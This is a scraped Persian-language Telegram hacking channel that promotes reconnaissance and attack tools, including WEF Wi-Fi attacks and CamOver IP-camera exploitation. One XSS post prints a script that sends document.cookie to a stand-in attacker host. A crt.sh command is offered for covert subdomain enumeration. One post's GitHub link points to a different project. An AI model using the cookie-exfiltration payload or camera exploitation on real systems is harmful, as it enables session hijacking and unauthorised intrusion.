Hack 4҉҈ Man
12.5K subscribers
10 photos
1 video
18 links
@durov Этот пост ни в коем случае не аморален.
Этот канал является фан-каналом, и мы не публикуем какой-либо аморальный
#telegram_Rules
#Правила_телеграма
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
👍1514
👾 vt-cli.

سرویس VirusTotal ابزار CLI مخصوص به خودش را دارد. می‌توانید لینک را بررسی کنید، فایل را اسکن کنید و اطلاعات مربوط به مقدار هش را دریافت کنید. تنها چیزی که برای استفاده نیاز دارید، کلید API است (که برای همه هنگام ثبت‌نام در دسترس است). اینجا بیشتر توضیح داده شده است:

https://virustotal.github.io/vt-cli/

🛡@ir_c_a
97👍31🔥6
This media is not supported in your browser
VIEW IN TELEGRAM
🚀 معرفی ابزار قدرتمند AutoRecon — شناسایی شبکه با سرعت و دقت بالا!

؛AutoRecon یک ابزار پیشرفته و چندرشته‌ای (Multi-threaded) برای شناسایی شبکه (Network Reconnaissance) است که به صورت خودکار سرویس‌های فعال را در شبکه شما فهرست می‌کند.

💻 این ابزار هوشمند، به طور خاص برای صرفه‌جویی در زمان شما در چالش‌های CTF (Capture The Flag) و محیط‌های تست نفوذ (Penetration Testing) مانند OSCP طراحی شده است. با قابلیت‌های خودکارسازی و سرعت بالا، AutoRecon به شما کمک می‌کند تا فرآیند شناسایی را به شکل چشمگیری تسریع بخشید و بر روی جنبه‌های مهم‌تر تست تمرکز کنید.

🔗 لینک گیت‌هاب

#AutoRecon #NetworkReconnaissance #PenetrationTesting #CTF #OSCP #CyberSecurity #HackingTools #InfoSec #NetworkScanning

🛡@ir_c_a
44👍28
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
🔸یک پراکسی تمام ترافیک را دریافت می‌کند و آن را بین چندین سرور تقسیم می‌کند تا بار را متعادل کند.

🔹اما اختلال کلودفلر نشان داد: اگر خود پراکسی خراب شود، اصلاً مهم نیست چند سرور پشت آن دارید. یک پیکربندی نادرست و کل edge عملاً خودش را دچار حمله دیداس کرده است.

#هکینگ #امنیت #اطلاعات
🛡@ir_c_a
48👍22
This media is not supported in your browser
VIEW IN TELEGRAM
💻 ؛LitterBox محیط ایزوله امن برای اجرای کد

🔸️؛LitterBox ابزاری است برای ایجاد محیطی ایزوله جهت اجرای امن کدهای غیرقابل اعتماد یا دلخواه.

🌐 لینک به گیت‌هاب
🛡@ir_c_a
48
This media is not supported in your browser
VIEW IN TELEGRAM
💻 ؛XSS — دزدیدن کوکی در یک ثانیه از طریق سایت دیگر

یک آسیب‌پذیری که ۲۰ سال قدمت دارد، اما هنوز هم هکرها را به پنل‌های مدیریت در سراسر جهان راه می‌دهد.

🎯 ماهیت: هکر در سایت یک فرم یا پارامتری پیدا می‌کند که <script> را فیلتر نمی‌کند. کد خود را در آن قرار می‌دهد. قربانی صفحه را باز می‌کند — کد اجرا می‌شود.

مثال دزدیدن کوکی (کوکی جلسه، جایی که رمز عبور به صورت رمزنگاری شده ذخیره شده):
<script>
  fetch('http://хакер.ру/steal?cookie=' + document.cookie);
</script>

حالا هکر جلسه قربانی را دارد. کوکی را در مرورگر قرار می‌دهد — و بدون رمز عبور با حساب او وارد می‌شود.

🟢 حفاظت:
- کاراکترهای خاص را بررسی کنید (htmlspecialchars)

🛡@ir_c_a
44
This media is not supported in your browser
VIEW IN TELEGRAM
🔸️؛WEF (چارچوب بهره‌برداری از وای‌فای) — چارچوبی برای ارزیابی امنیت و حملات به شبکه‌های وای‌فای

🔹️؛WEF ابزاری جامع برای خودکارسازی تست نفوذ در شبکه‌های بی‌سیم است. امکان انجام طیف گسترده‌ای از حملات را فراهم می‌کند، از جمله ایجاد «دوقلوهای شرور» (Evil Twin)، بهره‌برداری از آسیب‌پذیری‌های WPS و رهگیری دست‌دادن‌های WPA به صورت خودکار.

🌐 لینک گیت‌هاب
🛡@ir_c_a
🔥2111
This media is not supported in your browser
VIEW IN TELEGRAM
🌐؛GeoVista سامانه عاملی استدلال بصری با افزونه وب برای موقعیت‌یابی دقیق جغرافیایی

🔹️؛GeoVista یک سامانه پیشرفته مبتنی بر عامل‌های هوش مصنوعی است که برای تعیین موقعیت جغرافیایی از روی تصاویر (موقعیت‌یابی جغرافیایی) با استفاده از استراتژی‌های استدلال بصری و جستجوی خارجی طراحی شده است.

🔸️این پروژه مسائل پیچیده «جهت‌یابی بصری» را با تقلید از عملکرد یک کارشناس حل می‌کند: عامل جزئیات عکس (معماری، تابلوهای راهنمایی، چشم‌انداز) را تحلیل کرده و از جستجوی وب برای بررسی فرضیات استفاده می‌کند.

📌لینک گیت‌هاب
https://github.com/BlackSnufkin/LitterBox

🛡@ir_c_a
👍127
This media is not supported in your browser
VIEW IN TELEGRAM
💻 ؛ShodanX — ابزار پیشرفته برای تعامل با API شادان و انجام OSINT

🔺؛ShodanX یک ابزار خط فرمان قدرتمند است که برای جستجو و جمع‌آوری مؤثر اطلاعات درباره دستگاه‌های متصل به اینترنت از طریق پلتفرم شادان طراحی شده است.

🔺؛ShodanX کار با فیلترهای شادان را ساده می‌کند، از صادرات نتایج پشتیبانی می‌کند و به سرعت به کشف نقاط ورود احتمالی یا نشت داده‌ها در شبکه جهانی کمک می‌کند.

لینک به گیت‌هاب

🛡@ir_c_a
🔥10👍6
This media is not supported in your browser
VIEW IN TELEGRAM
🔥1
⚠️ ؛CamOver | ابزار شناسایی و تست نفوذ دوربین‌های IP پذیر

آیا می‌دانید چقدر از دوربین‌های مداربسته در شبکه بدون محافظت هستند؟ CamOver ابزاری تخصصی برای شناسایی و بررسی آسیب‌پذیری‌های دوربین‌های IP است. 🛡️🔍

🛠️ قابلیت‌های اصلی:
🔹 اسکن هوشمند: شناسایی خودکار مدل‌های آسیب‌پذیر از برندهای معروف (مانند Hikvision، TP-Link، CCTV و غیره).
🔹 بهره‌برداری خودکار: استفاده از آسیب‌پذیری‌های عمومی و اطلاعات کاربری پیش‌فرض (Default Credentials).
🔹 دسترسی به استریم: توانایی دسترسی به جریان ویدیویی دوربین‌های محافظت‌نشده.
🔹 انعطاف‌پذیری بالا: پشتیبانی از اسکن تک‌هدف و اسکن گسترده کل زیرشبکه.

👨‍💻 مناسب برای: متخصصین امنیت، تست‌کننده‌های نفوذ و کارشناسان شبکه.

📂 لینک مخزن در گیت‌هاب:
🔗 GitHub - CamOver

⚠️ توجه: این ابزار صرفاً جهت مقاصد آموزشی و تست امنیت تهیه شده است. استفاده غیرمجاز مسئولیت بر عهده کاربر است.

#امنیت_شبکه #تست_نفوذ #هک #دوربین_دوربین #سایبر_امنیت #CyberSecurity #EthicalHacking #CamOver #IPCamera

🛡@ir_c_a
11
This media is not supported in your browser
VIEW IN TELEGRAM
🔥2
💡 ترفند: پیدا کردن زیردامنه ها از طریق crt.sh بدون ایجاد سر و صدا

📌نمی خواهید اسکن فعال را آشکار کنید، و بررسی دستی زیردامنه، با یک دستور، تمام گواهینامه های SSL صادر شده برای یک دامنه در دسترس شما خواهد بود. crt.sh حتی زیردامنه هایی را می شناسد که در DNS ثبت نشده اند.

curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sort -u


📌به سادگی target.com را به جای مثال وارد کنید و پس از چند ثانیه، لیستی از تمام زیردامنه هایی که تا به حال در گواهینامه ها وجود داشته اند را مشاهده خواهید کرد. بدون نصب، بدون تنظیمات، و بدون هیچ ردی در لاگ های هدف.

توجه، در هنگام اجرای دستور VPN تون باید روشن باشه. ☑️

#ترفند #امنیت_شبکه #هک
🛡@ir_c_a
8
This media is not supported in your browser
VIEW IN TELEGRAM
🔥2